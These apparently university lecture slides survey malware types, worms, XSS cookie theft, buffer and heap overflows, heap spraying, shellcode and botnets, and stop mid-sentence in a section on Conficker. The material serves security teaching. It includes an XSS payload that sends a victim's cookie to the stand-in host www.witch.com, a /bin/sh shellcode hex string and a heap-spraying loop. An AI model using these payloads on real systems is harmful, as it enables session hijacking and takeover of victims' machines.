malware

Document Sample
malware Powered By Docstoc
					Malware
               Reading Material

• Ken Thompson and Trojans
   – http://www.ece.cmu.edu/~ganger/712.fall02/pap
     ers/p761-thompson.pdf
• Worm Anatomy and Model
  http://portal.acm.org/citation.cfm?id=948196
• Smashing the Stack for Fun and Profit
  http://insecure.org/stf/smashstack.html
                 Why Do We Care?

• SANS Top 20 Internet Security Vulnerabilities
   – http://www.sans.org/top20/
• Broad issues very similar year in and year out
                  Zero Day Exploit
• An exploit that has no patch available

• Time between exploit discovery and wide activation
  shrinking

• Malware developer has trade-off in launch tactics
  – Big splash but faster discovery
  – Reduced attack rate but longer undiscovered
              Windows Meta File Exploit
• Exploit flaws in the Windows rendering engine enable remote
  code execution
   –   Memory corruptions
   –   Visiting web site with “bad image” causes attack
   –   Attack sold for $4,000
   –   http://www.eweek.com/article2/0,1895,1918198,00.asp
• Bugtraq post in December 2005
   – Probably lingering earlier
   – 0 day exploit
• Microsoft’s response in early January 2006
   – http://www.microsoft.com/technet/security/bulletin/ms06-001.mspx
                   Malicious Code

• Set of instructions that cause a site’s security policy
  to be violated
• Often leveraging an inadvertent flaw (design or
  implementation)
   – To propagate/install on target
   – To cause harm on target
                   Malware Summary

Code type      Characteristics
Virus          Attaches itself to program and copies to other programs
Trojan Horse   Contains unexpected, additional funtionality
Logic Bomb     Triggers action when condition occurs
Time Bomb      Triggers action when specified time occurs
Trapdoor       Allows unauthorized access to functionality
Worm           Propagates copies of itself through a network
Rabbit         Replicates itself without limit to exhaust resources
Netbot         Trapdoor programs orchestrated through control channel (IRC)
Root Kit       Hooks standard OS calls to hide data
                  Trojan Horses

• Seemingly useful program that contains code that
  does harmful things
   – Perform both overt and covert actions
• Frequently embedded in applets or games, email
  attachments
• Trojan horse logins, spoof authentication or webpage
  forms
         Thompson's Trojan Compiler
• Detect it is compiling “login” program
   – Add “bug” to accept fixed password
• Problem:
   – Easily seen in code review
• Solution:
   – Add second bug activated when compiling compiler
     itself
   – Then remove bugs from source
           Key Loggers and Spyware

• Gather information from computer
   – Send back to the central office
• From key loggers can gather
   – Passwords
   – Confidential communication
   – Keep track of your kids/employees
• From spyware can gather
   – Web browsing habits
   – Gather marketing information
                      Rootkits

• Insert file filters to cause files or directories
  disappear from normal listings
   – Can replace Windows API pointers (user mode)
   – Can also replace syscall table pointers
• Both require privilege, but most Windows installs
  require privilege anyway
   – The power of extensibility used for the dark side
• Techniques apply equally well to Linux and Mac
             Sony Player DRM and Rootkits
• Bad press for Sony 2005
   – Mark Russinovich's original observations
     http://blogs.technet.com/markrussinovich/archive/2005/1
     0/31/sony-rootkits-and-digital-rights-management-gone-
     too-far.aspx#comments
   – A timeline
       • http://www.boingboing.net/2005/11/14/sony_anticustomer_te.ht
          ml
• To ensure that copy protection is not evaded install rootkit to hide the
  protection code
    –   Available for other attackers to use
    –   Uninstallable
    –   Uses CPU and memory
    –   Not adequately noted in EULA
                 Virus Operation

• Virus Phases:
   – Dormant: Waiting on trigger event
   – Propagation: Replicating to programs/disks
   – Triggering: By event to execute payload
   – Execution: Executing payload
• Details usually Machine/OS specific
   – Exploits different features or weaknesses
                    Virus Pseudocode

• beginvirus:
• If spread-condition then begin
   – For some set of target files do begin
      • If target is not infected then begin
          – Determine where to place virus instructions
          – Copy instructions from beginvirus to endvirus into target
          – Alter target to execute new instructions

• Perform some actions
• Goto beginning of infected program
• endvirus:
                     Virus Attachment
• A Virus can attach itself to a program or to data by
   – Appending itself to either the beginning or end of either source code
     or assembly, so it is activated when the program is run
   – Integrate itself into the program, spread out code
   – Integrate into data: executable text macro, scripting
   – Macros and email attachments
• An activated virus may:
   – Cause direct or immediate harm
   – Run as a memory resident program (TSR, daemon, or service)
   – Replace or relocate boot sector programs, start at system start-up
                    Macro Viruses
• Macro code attached to some data file
   – Interpreted rather than compiled
   – Platform independent
• Interpreted by program using the file
   – E.g., Word/Excel macros
   – Esp. using auto command and command macros
   – Often automatically invoked
• Blurs distinction between data and program files
  making task of detection much harder
• Classic trade-off: “ease of use” vs “security”
                   Email Viruses

• Spread using email with attachment containing a
  macro virus
   – Melissa, LoveBug
• Triggered when user opens or executes attachment
   – Also when mail viewed by using scripting features
     in mail agent
   – Usually targeted at Microsoft Outlook mail agent
     and Word/Excel documents, Microsoft IIS
                 Basic Precautions

• Don’t import untrusted programs
   – Who can you trust?
   – Viruses have been found in commercial shrink-
     wrap software
   – Standard download sites have been corrupted
      • Check MD5 hashes
• Scan for viruses, install anti-virus software
• Update anti-virus software regularly
               Signature Scanning

• Early viruses had characteristic code patterns known
  as signatures
• Create a database of patterns, search files for
  patterns (McAffee)
• Use data-mining, learning, feature extraction etc. to
  look for disguised or obfuscated patterns
• Can only scan for known signatures
         Signature Avoiding Viruses
• Polymorphic Virus produces varying but operational
  copies of itself
   – Use alternative but equivalent instructions
   – Gets around signature scanners. Whale virus, 32
     variants
• Stealth Virus actively tries to hide all signs of its
  presence
   – A virus can intercept calls to read a file and return
     correct values about file sizes etc.
       Another Signature Avoiding Virus
• Encrypted Virus stores bulk of self encrypted
   – Small decrypt routine in clear
   – Key stored in clear
                      Worms

• Propagate from one computer to another
• Viruses use email/infected media to propagate to so
  differentiation is fuzzy
               The Morris Worm Incident
• How 99 lines of code brought down the Internet (ARPANET actually) in
  November 1988.
• Robert Morris Jr. Ph.D student, Cornell, wrote a program that could:
    – Connect to another computer, and find and use one of several vulnerabilities
      (buffer overflow in fingerd, password cracking etc.) to copy itself to that
      second computer.
    – Begin to run the copy of itself at the new location.
    – Both the original code and the copy would then repeat these actions in an
      infinite loop to other computers on the ARPANET (mistake!)
• Morris was sentenced to three years of probation, 400 hours of
  community service, and a fine of $10,050. He is now a Professor at MIT.
• Worms have gotten bigger and more aggressive
                  Worm Phases

• Dormant
• Propagation
   – Search for other systems to infect
   – Establish connection to target remote system
   – Replicate self onto remote system
• Triggering
• Execution
                    Who to target?

• Scanning
   – Currently generally used
   – Select random addresses
      • Mix of addresses in current network (local computers
        probably have similar vulnerabilities) and remote
        networks
   – No longer feasible in IPv6
      • 32 bit vs 128 bit address space
                   Viruses and Worms in IPv4




• Slammer infected most of the IPv4 Internet in 10 minutes
  (75,000 hosts infected in one-half hour)
Source caida.org
                   Worms in IPv6
• Address space is 2^128 instead of 2^32
   – Random address selection will not work
• Say ¼ of address in IP4 network run Windows
   – 1 in 4 chance of finding a target with each probe
• Spread that among 2^128 addresses
   – 1 in 2^98 chances of finding a viable target
     Other Techniques to Find Targets
• Interesting Papers
   – How to 0wn the Internet… http://www.icir.org/vern/papers/cdc-
     usenix-sec02/
   – Top speed of flash worms
     http://vividmachines.com/papers/topspeed.pdf
• Hitlist Scanning
   – Stealthy scans (randomized, over months), distributed scanning,
• DNS searches, Spiders (Code red, crawls for high connectivity),
  listening on P2P networks, public lists
• Permutation scanning (divide up IP address space)
• Warhol worm- Hit list + permutation
                 Network Propagation

• Send small number of packets to reduce detection
• UDP packets
   – No ACK needed, so can spoof source address
• Connect to vulnerable network services
   – Generally exercise buffer overflow
   – Launch shell
      • Running at high privilege (ideal)
      • Or use as foothold to mount other attacks to gain privilege
      • Or use as attack launch point
                     Worm Examples

• Morris Worm
• Code Red
   –   Exploited bug in MS IIS to penetrate and spread
   –   Probes random IPs for systems running IIS
   –   Had trigger time for denial-of-service attack
   –   2nd wave infected 360000 servers in 14 hours
• Code Red 2 - trapdoor, for remote control
• Nimda - used multiple infection mechanisms, email,
  file-sharing, web-client, IIS, Code Red 2 backdoor
Attacks through browsers




                           32
                    HTML is stateless
• Each interaction of a client with server has no
  memory, at least as far as the protocol is concerned
• Session state is created by server, writing a “cookie”
  into a document as part of the header, saved by the
  client’s browser
      • May contain anything the server wishes to record, e.g.
         – Password, account number, identity, shopping cart
         – Most typically a session ID
• Cookie is returned by the browser with every access
  to the server


                                                                 33
                         How cookies work
From the client to the
   server, something like


With a response (to set a
  cookie) like




Browser understands to
   include cookie with
   every subsequent GET,
   e.g.


Cookie tells server the second request is related to the first

Other cookie attributes include domain, path, expiration date    34
                 Abuse of Cookies
• “Cookie hijacking”
   – Unencrypted cookie value sniffed off network,
     HTTP session is “hijacked” by outsider who has
     credentials the cookie represents
• “Cookie Theft”, more subtle, done remotely
   – Track behaviors
   – Reveal identity
   – Steal and abuse identity
• Access to cookies achieved using Javascript


                                                      35
                        Javascript
• Programming language designed to make web pages
  “dynamic”, e.g.,
   – Format checking of web form entries
   – Pop open a new window
   – Changing images as cursor passes over specific
     regions of the page
• Executed within a browser (“client-side”)
   – Can be embedded in page obtained from server
   – Interacts with elements of the page (“Document
     Object Model”, or DOM)
     • Includes data, javascript can get the value of a cookie
                                                                 36
              Document Object Model
• A script bound to a page has a
  “DOM” model of that page
• Can pass information back to
  the server, or a different web-
  site altogether
• So we have a powerful
  programming language in a web
  page that can get to sensitive
  information and send it
  elsewhere
   – Think maybe there’s potential
      for a problem here?


                                      37
                       Protection 101
A browser concurrently manages multiple pages from multiple
   origins
    – Each has its own document elements, including cookies
The “Same Origin Policy” prevents a document or script from
   one site of origin from manipulating or communicating with
   one from a different origin
    – But allows coordination for pages “within” same origin,
      e.g., scripts can “see” other pages, including their cookies
“Origin” here refers to (domain name, port, protocol) of site, see
   below




                                                                 38
              The security assumption
Under the Same Origin Policy, the client browser trusts
  any script it receives from the server to access any
  cookie bound to any page in the same domain
  because it trusts the server

Should it?

Frequently a server will just reflect back input from a
  client


                                                          39
           Example of Reflecting Input



   Query




Response




                                         40
           The client might send a script!
A cross site scripting (XSS) vulnerability exists at a
  server if it reflects back a script that is then executed
  at the client

But what’s the problem? A client attacks herself?

Watch this….




                                                          41
                                                 XSS Attack
 •   Suppose
                                                                 www.bob.com
      – www.bob.com has an XSS vulnerability
      – Alice visits www.bob.com a lot
           •   She logs in, www.bob.com returns a session ID
               cookie

      – Eve knows about the vulnerability and sends Alice        login
        an email with an evil link (containing an attack
        script)                                                                www.bob.com
           •   Or embedded in a CSS header with HTML formatted
               email. Alice only has to OPEN the message!




                                                                               cookie:session ID

http://host/a.php?variable="><script>document.location='http://www.witch.com/cgi-bin/get.cgi?
                        '%20+document.cookie</script>                                42
                       XSS Attack : Cookie Theft
 •   Directed at server                                         www.bob.com
 •   Embedded Script
 •   Transmission to www.witch.com
 •   Alice’s cookie



                                                                cookie:session ID



http://www.bob.com/a.php?
   variable="><script>document.location='http://www.witch.com/cgi-bin/get.cgi?
                        '%20+document.cookie</script>


                                                                                    43
                        XSS Attack : Cookie Theft

      www.bob.com                 www.bob.com                                       www.witch.com




                        …<script>…
                        Reflected back                                        cookie:session ID



    cookie:session ID           cookie:session ID
•    Click evil URL         •    Script takes permissions       cookie:session ID
                                 of Alice’s page on         •    Script executes
                                 www.bob.com


    • With Alice’s session ID, Eve can impersonate Alice, obtain sensitive
      information from her account on www.bob.com
                                                                                             44
                     Other XSS attacks
Bulletin Board Postings
    – some permit user inclusion of HTML
Mashups
    – Web sites that integrate interacting components from
      multiple sources, e.g., hotel listing with maps.google.com
      at the side or advertisements in Facebook
Mashups work around Same Origin Policy

If a Mashup framework is vulnerable to XSS, then a malicious
    component can inject code
     – e.g. a paid-for web advertisement


                                                                   45
                          Mashups
If a Mashup framework is vulnerable to XSS, then a malicious
    component can inject code (e.g. advertisement)




                                                               46
Attacks through memory




                         47
                          Outline
Typical attack through memory is comprised of several
  parts
   – Find an application with a memory vulnerability
      • Browsers, internet service apps, Adobe Reader…
   – Find a way of a controled overwrite of a critical
     piece of memory
      • Usually to get the computer to execute attacker’s code
   – Find a way of getting attacker’s code in memory
   – Trigger vulnerability with carefully crafted attack
     input


                                                                 48
                  Let’s start at the very beginning
  “Von Neumann” computers store programs in memory,
    along with data
  Modern computers use dedicated registers to “point” at key
    locations
                 Program Counter (PC)        Stack Pointer (SP)



An “instruction” is read out from
The memory location given by
the
PC, and interpreted by the
control
Unit
     • the PC is increased to point
     to the next instruction
     • the “stack” is dynamically
     changing scratch space
                                                                  49
                   Memory Organization
 Virtual memory --- hardware translation of logical
   address space to physical : every process “sees” the
   whole memory for itself
Memory partitioned in to different
  segments with different roles
   • Kernel
   • Text (instructions)
   • Initialized data
   • Uninitialized data
   • Dynamically allocated
      • Stack
      • heap

                                                          50
                     Jumping around
The PC advances linearly, except when it is explicitly loaded
   – To branch on a conditional instruction
   – To “jump” to a subroutine
   – To “return” from a subroutine
   – To handle an exception
   – To select the implementation of a “virtual function”

In all but the first of these cases, the value loaded into the
   PC is found explicitly in memory.
    – A memory attack consists of changing that value to
       point to some code the attacker managed to get into
       the memory
                                                                 51
                Primer on subroutines
A subroutine is a modular block of code
   – The program “calls” via a special CPU instruction
      • PC is loaded with the subroutine address
   – The subroutine “returns” to the instruction after
     the calling point, via a special CPU instruction
      • The address loaded into the CPU is on the “stack”




                                                            52
                     Stack Dynamics
• Each subroutine call pushes a frame onto the stack
   – It is popped on return
   – SP moves with each stack operation




   – Look at position of “Local Variables”
   – Memory writes go from low address to high address
   – Hold that thought….
                                                         53
                         Buffer Overflow
When a buffer is created memory, its maximum length is
   declared
Common operation : copy a string of characters, from one place
   in memory to another
    – By convention, a null byte (all 0’s) signals the end
Sloppy coding practice : copy one byte at a time, until null is
   reached
   from                             to


     a    b   c   null             empty empty   x    y       z


                                    buffer           In use
                         Buffer Overflow
When a buffer is created memory, its maximum length is
   declared
Common operation : copy a string of characters, from one place
   in memory to another
    – By convention, a null byte (all 0’s) signals the end
Sloppy coding practice : copy one byte at a time, until null is
   reached
   from                             to


          b   c   null              a    empty   x    y       z


                                    buffer           In use
                           Buffer Overflow
When a buffer is created memory, its maximum length is
   declared
Common operation : copy a string of characters, from one place
   in memory to another
    – By convention, a null byte (all 0’s) signals the end
Sloppy coding practice : copy one byte at a time, until null is
   reached
       from                              to


         b    c   null               a   empty   x    y       z


                                     buffer          In use

     from points to null? No
                           Buffer Overflow
When a buffer is created memory, its maximum length is
   declared
Common operation : copy a string of characters, from one place
   in memory to another
    – By convention, a null byte (all 0’s) signals the end
Sloppy coding practice : copy one byte at a time, until null is
   reached
         from                            to


     a    b     c   null             a   b    x    y       z


                                     buffer       In use
                           Buffer Overflow
When a buffer is created memory, its maximum length is
   declared
Common operation : copy a string of characters, from one place
   in memory to another
    – By convention, a null byte (all 0’s) signals the end
Sloppy coding practice : copy one byte at a time, until null is
   reached
             from                             to


     a   b    c     null             a   b    x     y       z


                                     buffer        In use

     from points to null? No
                               Buffer Overflow
When a buffer is created memory, its maximum length is
   declared
Common operation : copy a string of characters, from one place
   in memory to another
    – By convention, a null byte (all 0’s) signals the end
Sloppy coding practice : copy one byte at a time, until null is
   reached
             from                                 to


     a   b    c     null                 a   b    c     y       z


                                         buffer        In use


                           !
                         Buffer Overflow
• Most common pen-test security vulnerability 2003 (SANS/FBI)
• One of the most serious classes of security threats
   – An attacker can gain partial or complete control of a host
• Buffer (array or string): space in which data can be held
• A buffer’s capacity is finite:
   – char sample[10];
   – sample*10+ = ’A’;
• Buffer sizes do not have to be predefined. Out-of-bounds
  error




                                                                  60
                Effects of Buffer Overflow
• A program that fails to check a buffer overflow may
  allow vital code or data to be overwritten
• A buffer may overflow into and change:
   –   User’s own data structures
   –   User’s program code
   –   System data structures
   –   System program code
• Most common attack is to subvert the function of a
  privileged program and take control of the host



                                                        61
             Old School : Stack Smashing
• Attacker overflows stack allocated variable to corrupt
  the return address
• Also called Stack Smashing Attack.
   – Formerly most common buffer-overflow attack, now
     largely mitigated
• Rewrite return address or frame pointer with attack
  code, or rewrite pointer to address to “attack” code
  in user memory
• On return executing code in stack buffer at original
  program privilege
   – Typically attackers exec a shell




                                                         62
                    Stack smashing
Sometimes a subroutine will create a buffer in “local
  variables”, copy a string into it, but not check length




                        Buffer




                                                            63
                    Stack smashing
Sometimes a subroutine will create a buffer in “local
  variables”, copy a string into it, but not check length




                     Attacker data




                                                            64
                    Stack smashing
Sometimes a subroutine will create a buffer in “local
  variables”, copy a string into it, but not check length



                     Attacker data




                                                            65
                          Stack smashing
Sometimes a subroutine will create a buffer in “local
  variables”, copy a string into it, but not check length


                        Address of “shellcode”
                            Attacker data




      Returning from subroutine call loads PC with address of “shellcode”
          about which more, anon                                            66
                        Stack smashing
Sometimes a subroutine will create a buffer in “local
  variables”, copy a string into it, but not check length
                             shellcode

                      Address of “shellcode”
                           Attacker data




           Attack code just part of the string being copied
                                                              67
           Defense against stack smashing
The attacker needs to know the memory address of his
  shellcode
   – The attacker’s string gets loaded on to the stack,
     attacker can use a debugger to figure out addresses

Defenses include
• setting “no execute” protection on stack
• Randomization of memory layout with each program
  execution
• Static and dynamic buffer bounds checking

                                                       68
              The Empire Strikes Back
Attacker attention moved to attacks through memory
  addresses not on the stack

Stack allocations are temporarily, they disappear after a
  subroutine returns

The “heap” allows a program to dynamically request a
  block of memory, and have it stay allocated across
  multiple subroutine calls

The data segments store variables and strings that
  might also be subverted by an overflow
                                                        69
             Example : changing a file name
• Imagine a buffer that resides just below a string that identifies
  a file

                 /   t   m p    /   s   c   r   a   t   c   h null

        buffer
• Further imagine a program that has a buffer overflow
  vulnerability on “buffer”, opens the named file, and writes
  user supplied information there
• Attack consists of
   – Overwriting buffer, replacing file name with attacker’s
     choice, e.g., /etc/.rhosts
   – Choosing string to write into file, e.g., an rhosts file that
     includes attacker’s machine
• Observe that no subversion of control flow occurs

                                                                     70
             Attacks through the heap : preliminaries
   Remember doubly linked lists

0xbcd3000                  0xbcd3080               0xbcd4000
    “next”     0xbcd3080               0xbcd4000                  null
   “prev”        null                  0xbcd3000               0xbcd3080
      size       100                      32                      80




 Programs dynamically add and delete items

                                                                         71
             Attacks through the heap : preliminaries
   To remove center block from list, change pointers

0xbcd3000                  0xbcd3080               0xbcd4000
    “next”     0xbcd3080               0xbcd4000                  null
   “prev”        null                  0xbcd3000               0xbcd3080
      size       100                      32                      80




                                                                         72
            Attacks through the heap : preliminaries
   To remove center block from list, change pointers
Variable “hdr”

0xbcd3000                    0xbcd3080                 0xbcd4000
    “next”       0xbcd3080                                           null
   “prev”          null                  0xbcd3000                 0xbcd3080
                   100                      32                       80




            hdr->next->next->prev        =     hdr->next->prev

                                                                            73
            Attacks through the heap : preliminaries
   To remove center block from list, change pointers
Variable “hdr”

0xbcd3000                    0xbcd3080                 0xbcd4000
    “next”       0xbcd3080                                           null
   “prev”          null                  0xbcd3000                 0xbcd3080
                   100                      32                       80




            hdr->next->next->prev        =     hdr->next->prev

                                                                            74
            Attacks through the heap : preliminaries
   To remove center block from list, change pointers
Variable “hdr”

0xbcd3000                    0xbcd3080                 0xbcd4000
    “next”       0xbcd3080                                           null
   “prev”          null                  0xbcd3000                 0xbcd3080
                   100                      32                       80




            hdr->next->next->prev        =     hdr->next->prev

                                                                            75
            Attacks through the heap : preliminaries
   To remove center block from list, change pointers
Variable “hdr”

0xbcd3000                    0xbcd3080                 0xbcd4000
    “next”       0xbcd3080                                           null
   “prev”          null                  0xbcd3000                 0xbcd3080
                   100                      32                       80




            hdr->next->next->prev        =     hdr->next->prev

                                                                            76
            Attacks through the heap : preliminaries
   To remove center block from list, change pointers
Variable “hdr”

0xbcd3000                    0xbcd3080                 0xbcd4000
    “next”       0xbcd3080                                         null
   “prev”          null                  0xbcd3000
                   100                      32                     80




            hdr->next->next->prev        =     hdr->next->prev

                                                                          77
            Attacks through the heap : preliminaries
   To remove center block from list, change pointers
Variable “hdr”

0xbcd3000                    0xbcd3080                 0xbcd4000
    “next”       0xbcd3080                                         null
   “prev”          null                  0xbcd3000
                   100                      32                     80




            hdr->next->next->prev        =     hdr->next->prev

  OBSERVE : header has target address, AND value to load                  78
            Attacks through the heap : preliminaries
   To remove center block from list, change pointers
Variable “hdr”

0xbcd3000                      0xbcd3080                 0xbcd4000
    “next”       0xbcd3080                                           null
   “prev”          null                    0xbcd3000
                   100                        32                     80




            hdr->next->next->prev          =     hdr->next->prev

            hdr->next        = hdr->next->next                              79
             Attacks through the heap : the real deal
   Suppose an attacker can corrupt the middle header
Variable “hdr”

0xbcd3000                    0xbcd3080                    0xbcd4000
    “next”       0xbcd3080                 Jump adrs                     null
   “prev”          null                  Shellcode adrs               0xbcd3080
                   100                        32                        80




                                                                  User Data Object
                                                                      Function ptr

                                                                                80
             Attacks through the heap : the real deal
   Suppose an attacker can corrupt the middle header
Variable “hdr”

0xbcd3000                    0xbcd3080                    0xbcd4000
    “next”       0xbcd3080                 Jump adrs                      null
   “prev”          null                  Shellcode adrs                0xbcd3080
                   100                        32                         80




 The unlinking overwrites return adrs                             User Data Object
 On call to function, control passed to                                Sub return
                                                                      Function ptr
   shellcode
                                                                                 81
           How can headers become corrupted?
• Attack has to know how heap is managed
• Attack code uses allocations/deallocations to get
      – A pointer to an object that points to the target
      – A pointer to an object immediately “below” the target in memory
        that can be over-flowed




hdr


                                   next
                                   prev
                                   32


                                                                          82
           How can headers become corrupted?
• Attack has to know how heap is managed
• Attack code uses allocations/deallocations to get
      – A pointer to an object that points to the target
      – A pointer to an object immediately “below” the target in memory
        that can be over-flowed




hdr


                                   next
                                   prev
                                   32


                                                                          83
           How can headers become corrupted?
• Attack has to know how heap is managed
• Attack code uses allocations/deallocations to get
      – A pointer to an object that points to the target
      – A pointer to an object immediately “below” the target in memory
        that can be over-flowed




hdr


                                   next
                                   prev
                                   32


                                                                          84
           How can headers become corrupted?
• Attack has to know how heap is managed
• Attack code uses allocations/deallocations to get
      – A pointer to an object that points to the target
      – A pointer to an object immediately “below” the target in memory
        that can be over-flowed




hdr


                                  next
                                Jump adrs
                                   prev
                                   32


                                                                          85
           How can headers become corrupted?
• Attack has to know how heap is managed
• Attack code uses allocations/deallocations to get
      – A pointer to an object that points to the target
      – A pointer to an object immediately “below” the target in memory
        that can be over-flowed




hdr


                                   next
                                 Jump adrs
                                    prev
                               Shellcode adrs
                                    32


                                                                          86
                Heap-based attacks
• Intimate knowledge of how heap is managed
  required
• Application code with suitable overflow vulnerability
  required
• Ability to allocate / deallocate heap blocks to
  position for attack required
• Ability to load shellcode required
• Ability to aim jump at shellcode required

Seems very tricky, but…


                                                      87
                Heap-based attacks
• Intimate knowledge of how heap is managed
  required
   – Attacker can observe using debugger; this
     information is shared in the cyber underground




                                                      88
                  Heap-based attacks
• Intimate knowledge of how heap is managed required
• Application code with suitable overflow vulnerability
  required
   – “Fuzzing” an application with lots of random junk
     leads to a crash, post-mortum analysis finds where
     heap pointers corrupted due to overflow… attack
     found his toehold
   – Fuzzing with not-so-random junk, e.g. looking for
     integer/floating point overflows
      • Mismatch between allocated space (too small) and data
        being loaded there




                                                                89
                Heap-based attacks
• Intimate knowledge of how heap is managed
  required
• Application code with suitable overflow vulnerability
  required
• Ability to allocate / deallocate heap blocks to
  position for attack required
   – Web browsers running javascript or flash take
     scripts offered on webpages and run them.
   – pdf documents carry scripts in their headers,
     readers run them immediately


                                                      90
                   Heap-based attacks
• Intimate knowledge of how heap is managed required
• Application code with suitable overflow vulnerability
  required
• Ability to allocate / deallocate heap blocks to position for
  attack required
• Ability to load shellcode required
   – Shellcode encoded in strings written into dynamically
     allocated memory
       • May be passed as part of attack input through web
         connection
       • May be embedded in image, document, or string in
         attacker’s script

                                                             91
                Heap-based attacks
• Intimate knowledge of how heap is managed
  required
• Application code with suitable overflow vulnerability
  required
• Ability to allocate / deallocate heap blocks to
  position for attack required
• Ability to load shellcode required
• Ability to aim jump at shellcode required
   – Difficult to get exactly, but there are ways…


                                                      92
     State of the art in browser exploitation
Stack overflows : classic, but defenses have been raised




                    (detect overruns before using jump address)


                             (Structured Exception Handling)




                       (attacker has to guess at stack layout)



                                                                        93
                    “Heap Feng Shui in Javascript”, Alexander Sotirov
                   Heap overflows
We’ve seen proof of concept, in practice it is hard and
 defenses have been raised




                                    (trick shown earlier….BUSTED)




                                                                        94
                    “Heap Feng Shui in Javascript”, Alexander Sotirov
              What’s left to attack?
• Non-array stack overflows
   – Very rare
• Use of uninitialized variables
   – Stack variables
   – Use after “free”
• Application data on the heap
   – Application specific memory headers
   – Function pointers
   – C++ object pointers



                                                                      95
                  “Heap Feng Shui in Javascript”, Alexander Sotirov
            Definitive attack “setSlice”
• Uses heap spraying to fill browser heap with
  shellcode
• Overwrites application object pointer in the previous
  heap chunk
   – Here an application vulnerability is required
   – Hope that after attack overwrites object pointer,
     the application actually uses that pointer!
   – May just end up crashing the browser




                                                                       96
                   “Heap Feng Shui in Javascript”, Alexander Sotirov
                    Heap Spraying
Developed by Blazde and SkyLined, used by most
  browser exploits since 2004
      var x = new Array();
       // fill 200MB of memory with copies of NOP
       // slide and shellcode

      for(var i = 0; i < 200; i++) {
         x[i] = nop + shellcode;
       }



                                                                        97
                    “Heap Feng Shui in Javascript”, Alexander Sotirov
Normal heap layout




                                                      98
  “Heap Feng Shui in Javascript”, Alexander Sotirov
After heap spraying




                                                      99
  “Heap Feng Shui in Javascript”, Alexander Sotirov
            Function pointer overwrite
1. Spray the heap with 200MB of shellcode (and slide)
2. Overwrite a function pointer with 0x0c0c0c0c (e.g.
   some pointer to an exception handler in static data)
3. Arrange for the pointer to be called




                                                                       100
                   “Heap Feng Shui in Javascript”, Alexander Sotirov
                    Object pointer overwrite
• Spray the heap with 200MB of shellcode, using byte
  0x0c as a NOP
• Overwrite an object pointer with 0x0c0c0c0c
• Call a virtual function of the object
  presumed object            presumed vtable                                 presumed function
   at 0xc0c0c0c0              at 0xc0c0c0c0                                    at 0xc0c0c0c0



 Pointer to table of
 virtual function           Particular function
 pointers is some           called determines
 offset from base, but      offset into
 is 0x0c0c0c0c              vtable…but
                            whatever it indexes
                                                                                                 101
                            to, the value there is
                         “Heap Feng Shui in Javascript”, Alexander Sotirov
                Clever but unreliable
• Heap spraying very effective, but setSlice exploit is
  not reliable
• Overwriting application data requires a specific
  layout of heap chunks, not controlled in setSlice
• Need to prepare the heap state prior to the exploit




                                                                        102
                    “Heap Feng Shui in Javascript”, Alexander Sotirov
                   Heap Feng Shui
• The heap allocator is deterministic
• Specific sequences of allocations and frees can be
  used to control the layout




                                                                       103
                   “Heap Feng Shui in Javascript”, Alexander Sotirov
                   Heap Feng Shui
• The heap allocator is deterministic
• Specific sequences of allocations and frees can be
  used to control the layout




                                                                       104
                   “Heap Feng Shui in Javascript”, Alexander Sotirov
                   Heap Feng Shui
• The heap allocator is deterministic
• Specific sequences of allocations and frees can be
  used to control the layout




                                                                       105
                   “Heap Feng Shui in Javascript”, Alexander Sotirov
                   Heap Feng Shui
• The heap allocator is deterministic
• Specific sequences of allocations and frees can be
  used to control the layout




                                                                       106
                   “Heap Feng Shui in Javascript”, Alexander Sotirov
                   Heap Feng Shui
• The heap allocator is deterministic
• Specific sequences of allocations and frees can be
  used to control the layout




• Exploit requires very careful series of heap ops from
  Javascript….but it works….
                                                                        107
                    “Heap Feng Shui in Javascript”, Alexander Sotirov
             You promised us shellcode…
• Small piece of code used as payload in an exploit of a
  computer vulnerability
   – Needs to be in binary
      • Requires attention to a lot of details
      • Can’t have null bytes (usually passed as a string, null
        terminates a string)
   – Gives some kind of service to the attacker
      • An interactive command “shell”
      • TCP/IP connection back to attacker
      • Downloads and executes malware
          – “drive-by downloads”




                                                                  108
                      More on Shell Code
• Insert code to spawn a shell
• Phrack article discusses how to do this from first
  principles
   – Create assembly code to exec /bin/sh
   – Use GDB to get hex of binary code
   – Rework assembly as necessary to avoid internal 0’s
       • Could break attack if strcpy is used by attack target
• Will result in a hex string like:
   – “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46
     \x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\
     x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh”




                                                                 109
                   More on shellcodes
• Local – hacker sitting at the machine, networking not
  needed
• Remote
   – Connect-back : shellcode able to open TCP/IP
     connection back to attacker
   – Bindshell : shell code has to “bind” to a port and
     “listen” for a connection from the attacker
   – Socket-reuse : shellcode able to use an already
     opened network connection
      • Hard to exploit, hard to detect
   – Big win if exploited code is “setuid”
      • Means that malware can run with root priviledges



                                                           110
                 Drive-by downloads
• In 2007 Google surveyed billions of sites, subjecting 4.5M
  to scrutiny
   – 450,000 able to launch drive-by downloads (only
     through vulnerable browsers)
   – Another 700,000 capable of other compromises
• Many use social engineering, “click here for ….”
• Attack code often hidden in parts of page not controlled
  by site
   – Banner advertisements, widgets (e.g. traffic
     counter)…these loaded from 3rd party site
   – Posting / comments in blogs (see cross-site scripting)


                                                          111
                       Botnets
A compromised host (“zombie”) follows commands
  obtained from a C&C (command and control)
  computer
• Zombie will scan enivronment for resources---what
  can it be used for---and report to bot master
• Will often use an IRC channel, IM, or twitter for
  communication (to hide)
   – But these become known
   – Reaction has been designs that are more resilient
     to identification, shutdown, C&C discovery

                                                     112
                     Botnet economy
• Large botnets have grown (e.g., Conficker)
• Use is sold in an underground economy, e.g., to serve out
  spam




                                                              113
                                Conficker
See http://mtc.sri.com/Conficker

Timeline
• Sept 08 : previously unknown vulnerability used in exploits (dubbed MS08-
  67) --- malformed Remote Procedure Call in Windows requests cause
  buffer overflow
     – Affects all modern versions of Windows
•   Sept 08 : Chinese hackers sell exploit for $37.80
•   Oct 23 08 : Microsoft issues “emergency patch”
•   Nov. 22 08: Worm outbreak of Conficker reported in PC World
•   Last estimate over 12 million infections
     – Why? Patch ignored. Many bootleg copies of Windows
                       Conficker : How it works
Exploit:
•   Victim : Buffer overflow loads shellcode
     –   contacts infector which is running HTTP service, downloads worm
     –   Worm is in dynamically linked library (DLL) form, runs as a service via svchost.exe
     –   encrypted
     –   Brought up with every reboot
•   Worm scans (see the CAIDA report )
     – Local network scans (determine broadcast domain from network interface)
     – Nearby other infected hosts -- keeps a list of hosts it has infected, and scans the 256
